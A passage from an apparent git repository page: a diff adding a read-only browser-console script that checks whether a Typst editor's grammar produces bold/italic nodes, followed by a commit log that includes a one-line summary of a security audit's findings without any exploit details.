-  quartoFlavor?: 'revealjs' | 'pdf'
 }

 export type Project = MergeAndOverride<
@@ -0,0 +1,52 @@
+// Typst bold/italic parse-tree diagnostic
+// Open a Typst document that contains  *bold*  and  _italic_  text,
+// then paste this whole block into the browser console.
+
+(function () {
+  const strong  = [...document.querySelectorAll('.tok-strong')]
+  const emphasis = [...document.querySelectorAll('.tok-emphasis')]
+
+  console.group('=== Typst bold/italic diagnostic ===')
+
+  console.log('tok-strong  count :', strong.length)
+  console.log('tok-emphasis count:', emphasis.length)
+
+  if (strong.length) {
+    console.log('tok-strong  text  :', strong.map(s => JSON.stringify(s.textContent)))
+  }
+  if (emphasis.length) {
+    console.log('tok-emphasis text :', emphasis.map(s => JSON.stringify(s.textContent)))
+  }
+
+  // Interpret results
+  if (strong.length === 0 && emphasis.length === 0) {
+    console.warn(
+      'RESULT: Grammar is NOT producing Strong/Emphasis nodes.',
+      'This is a LALR state-merge bug — needs a grammar fix.'
+    )
+  } else {
+    const strongText  = strong.map(s => s.textContent).join('')
+    const emphText    = emphasis.map(s => s.textContent).join('')
+    const hasMidStrong  = strong.length > 2   // more than just the two * delimiters
+    const hasMidEmph    = emphasis.length > 2
+
+    if (hasMidStrong || hasMidEmph) {
+      console.info(
+        'RESULT: Grammar IS producing Strong/Emphasis nodes (content inside delimiters is styled).',
+        'Bold/italic not visible? Issue is the loaded font — Source Code Pro only has Regular (400).',
+        'Fix: switch editor font to DM Mono (which has actual Italic + Medium faces).',
+        'Or: load Source Code Pro Bold/Italic font files.'
+      )
+    } else {
+      console.warn(
+        'RESULT: Partial — only the delimiters (* or _) are styled, not the text between them.',
+        'StrongText/EmphText nodes are missing. Needs a grammar fix.'
+      )
+    }
+
+    console.log('all strong text joined :', JSON.stringify(strongText))
+    console.log('all emphasis text joined:', JSON.stringify(emphText))
+  }
+
+  console.groupEnd()
+})()
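The decision logic in the bold/italic diagnostic above can be isolated as a pure function, which makes the three outcomes easier to see and to check outside the browser. This is a minimal sketch, not part of the commit: `classifyStrongEmphasis` and its return labels are hypothetical names, and the `> 2` threshold is copied from the script's own heuristic (more styled spans than the two delimiters).

```javascript
// Hypothetical helper (not in the commit): mirrors the branch structure of
// the diagnostic script, taking the two .tok-* element counts as inputs.
function classifyStrongEmphasis(strongCount, emphasisCount) {
  if (strongCount === 0 && emphasisCount === 0) {
    // No styled spans at all: the grammar is not producing the nodes.
    return 'no-nodes'
  }
  if (strongCount > 2 || emphasisCount > 2) {
    // More spans than the two delimiters: content between them is styled.
    return 'content-styled'
  }
  // Only the delimiters appear to be styled.
  return 'delimiters-only'
}

console.log(classifyStrongEmphasis(0, 0)) // no-nodes
console.log(classifyStrongEmphasis(3, 0)) // content-styled
console.log(classifyStrongEmphasis(2, 2)) // delimiters-only
```

In the browser the inputs would be `document.querySelectorAll('.tok-strong').length` and the `.tok-emphasis` equivalent. The threshold appears to assume a test document with a single bold run and a single italic run; with several runs, delimiter-only styling could also exceed two spans and be reported as `content-styled`.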
Author	SHA1	Message	Date
claude	952c897760	docs: add alpha-3 security audit report Four findings: shell injection via filename (RCE on CLSI), auth bypass on publish-presentation routes, shell-escape without sandbox in prod, and stored XSS via published presentations (CSP removed on main origin). Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-06-19 10:10:19 +00:00
alois	713aa70c52	Update issues3.png	2026-06-09 07:25:39 +00:00
alois	3e0188b66d	Upload files to "/"	2026-06-09 07:25:13 +00:00
claude	8c9a610f0d	tools: add Typst bold/italic parse-tree diagnostic script Paste typst-bold-italic-diag.js into the browser console while a Typst document containing *bold* and _italic_ is open to determine whether Strong/Emphasis nodes are being produced by the grammar (grammar issue) or whether the nodes exist but bold/italic is not visually rendered (font issue — Source Code Pro only loads Regular 400). Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-06-08 22:02:14 +00:00
alois	6496e9133d	Update issues2.png	2026-06-08 21:22:11 +00:00
alois	5fcf4bb262	Upload files to "/"	2026-06-08 21:21:48 +00:00
alois	8e6e9eded0	Update issues.png	2026-06-08 20:45:03 +00:00
alois	33c830b594	Upload files to "issue.png"	2026-06-08 20:44:27 +00:00
claude	f36dbd12e9	chore: rewrite diagnostic — CSS class counts + cm-content view accessor	2026-06-08 19:35:02 +00:00
claude	c65bb80512	chore: fix CodeMirror view accessor in diagnostic script	2026-06-08 19:29:49 +00:00
claude	031f65224c	chore: add browser diagnostic script for Typst highlighting	2026-06-08 19:29:49 +00:00
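
The brace-depth tracking that `codeBlockTokenizer` introduces in the diff above can be tried on a plain string without Lezer. The following is a minimal sketch under stated assumptions: `findCodeBlockEnd` is a hypothetical helper, not part of the commit, and it works on string indices rather than on Lezer's `InputStream`. It returns the index of the `}` that closes the block, which corresponds to the point where the tokenizer stops and leaves the brace for the grammar rule.

```javascript
// Hypothetical helper (not in the commit): scan from `start`, which is the
// first character after the opening '{', and return the index of the
// matching '}' or -1 if the block is never closed.
function findCodeBlockEnd(text, start) {
  let depth = 1
  for (let i = start; i < text.length; i++) {
    const ch = text[i]
    if (ch === '{') {
      depth++
    } else if (ch === '}') {
      if (depth === 1) return i // closing brace of the outer block
      depth--
    }
  }
  return -1
}

const src = '#{ f({ x }) } tail'
const end = findCodeBlockEnd(src, 2)
console.log(end)               // 12
console.log(src.slice(2, end)) // " f({ x }) "
```

Two differences from the tokenizer in the diff are worth noting. When the input ends before the block is closed, the tokenizer still accepts everything read so far as `CodeBlockBody`, whereas this sketch returns `-1`. Like the tokenizer, the sketch counts every brace, so a `}` inside a string literal would also change the depth.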